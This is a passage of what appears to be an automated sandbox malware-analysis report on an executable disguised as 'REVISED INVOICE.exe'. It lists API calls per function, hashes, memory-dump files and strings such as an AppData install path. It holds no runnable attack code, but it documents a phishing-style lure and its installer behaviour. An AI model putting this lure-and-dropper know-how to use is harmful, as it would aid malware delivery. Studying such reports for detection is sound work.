                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                                                • Instruction ID: 29b39a71cad52391c8dc255d064a3e1ff9ef0cb324877085b5716ecfb2dd3a49
                                                                                                • Opcode Fuzzy Hash: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
                                                                                                • Instruction Fuzzy Hash: 80B09236A84200BADA214B00ED09F857A62A76C701F008864B300240B0CAB284A2DB19
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403504,?), ref: 00403230
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: de64ca168c72298822c85fa8c91d087914f90d0b4893d32d5ec60667c632bf75
                                                                                                • Instruction ID: 97e26b744c28169e8b025be137c519adc4d29a227e598783c976d4988d520b86
                                                                                                • Opcode Fuzzy Hash: de64ca168c72298822c85fa8c91d087914f90d0b4893d32d5ec60667c632bf75
                                                                                                • Instruction Fuzzy Hash: 47D0C977B14100ABD720EFB9AE898AB73ACEB513293204833D902E10A2D579D802866D
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040531B
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040532A
                                                                                                • GetClientRect.USER32(?,?,00000004), ref: 00405367
                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040536E
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
                                                                                                • ShowWindow.USER32(00000000,?), ref: 004053F6
                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040540A
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040542B
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405339
                                                                                                  • Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040547D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005251,00000000), ref: 0040548B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405492
                                                                                                • ShowWindow.USER32(00000000), ref: 004054B6
                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054BB
                                                                                                • ShowWindow.USER32(00000008), ref: 00405505
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
                                                                                                • CreatePopupMenu.USER32 ref: 0040554A
                                                                                                • AppendMenuW.USER32 ref: 0040555E
                                                                                                • GetWindowRect.USER32(?,?), ref: 0040557E
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
                                                                                                • OpenClipboard.USER32(00000000), ref: 004055DF
                                                                                                • EmptyClipboard.USER32 ref: 004055E5
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004055FB
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040562F
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
                                                                                                • CloseClipboard.USER32 ref: 00405640
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                                                • Instruction ID: 3cf410e3b9716a944c4f9a47a0d896a4f96f7db2f8ccf501d1eae2c46102dad2
                                                                                                • Opcode Fuzzy Hash: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                                                • Instruction Fuzzy Hash: 85B13A71900208FFDB21AF60DD85AAE7B79FB44355F40803AFA01BA1A0C7755E52DF69
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004045CD
                                                                                                • SetWindowTextW.USER32(00000000,?,?), ref: 004045F7
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046A8
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046B3
                                                                                                • lstrcmpiW.KERNEL32(antireform,00422708,00000000,?,?), ref: 004046E5
                                                                                                • lstrcatW.KERNEL32(?,antireform), ref: 004046F1
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?,?), ref: 00404703
                                                                                                  • Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A,000003FB,?), ref: 0040575B
                                                                                                  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 00406316
                                                                                                  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 00406325
                                                                                                  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 0040632A
                                                                                                  • Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300), ref: 0040633D
                                                                                                • GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
                                                                                                • MulDiv.KERNEL32 ref: 004047E1
                                                                                                  • Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                                                  • Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
                                                                                                  • Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: A$C:\Users\user\AppData\Local\fona\Kvit$antireform
                                                                                                • API String ID: 2624150263-652568304
                                                                                                • Opcode ID: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                                                • Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
                                                                                                • Opcode Fuzzy Hash: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
                                                                                                • Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404332
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
                                                                                                • GetSysColor.USER32(?), ref: 00404360
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
                                                                                                • lstrlenW.KERNEL32(?), ref: 00404381
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004043FC
                                                                                                • SendMessageW.USER32(00000000), ref: 00404403
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040442E
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
                                                                                                • LoadCursorW.USER32 ref: 0040447F
                                                                                                • SetCursor.USER32(00000000), ref: 00404482
                                                                                                • ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
                                                                                                • LoadCursorW.USER32 ref: 004044A3
                                                                                                • SetCursor.USER32(00000000), ref: 004044A6
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                • String ID: N$antireform$open
                                                                                                • API String ID: 3615053054-2892773833
                                                                                                • Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                                                • Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
                                                                                                • Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
                                                                                                • Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32 ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                                                • Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
                                                                                                • Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                                                • Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5
                                                                                                APIs
                                                                                                • lstrcpyW.KERNEL32(00425DA8,NUL), ref: 00405D5D
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405D81
                                                                                                • GetShortPathNameW.KERNEL32(?,00425DA8,00000400,?,00409300,00405EE1,?,?), ref: 00405D8A
                                                                                                  • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                                                  • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                                                • GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400,?,00409300,00405EE1,?,?), ref: 00405DA7
                                                                                                • wsprintfA.USER32 ref: 00405DC5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
                                                                                                • SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EAE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405EB5
                                                                                                  • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                                                  • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                • API String ID: 222337774-899692902
                                                                                                • Opcode ID: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                                                • Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
                                                                                                • Opcode Fuzzy Hash: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                                                • Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD
                                                                                                APIs
                                                                                                • CharNextW.USER32(00409300), ref: 00406316
                                                                                                • CharNextW.USER32(00409300), ref: 00406325
                                                                                                • CharNextW.USER32(00409300), ref: 0040632A
                                                                                                • CharPrevW.USER32(00409300,00409300), ref: 0040633D
                                                                                                Strings
                                                                                                • *?|<>/":, xrefs: 00406305
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062B4
                                                                                                • "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 004062F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-3856209036
                                                                                                • Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                                                • Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
                                                                                                • Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                                                • Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404167
                                                                                                • GetSysColor.USER32(00000000,?), ref: 00404183
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040418F
                                                                                                • SetBkMode.GDI32(?,?), ref: 0040419B
                                                                                                • GetSysColor.USER32(?), ref: 004041AE
                                                                                                • SetBkColor.GDI32(?,?), ref: 004041BE
                                                                                                • DeleteObject.GDI32(?), ref: 004041D8
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004041E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                                                • Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
                                                                                                • Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                                                • Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65
                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                  • Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
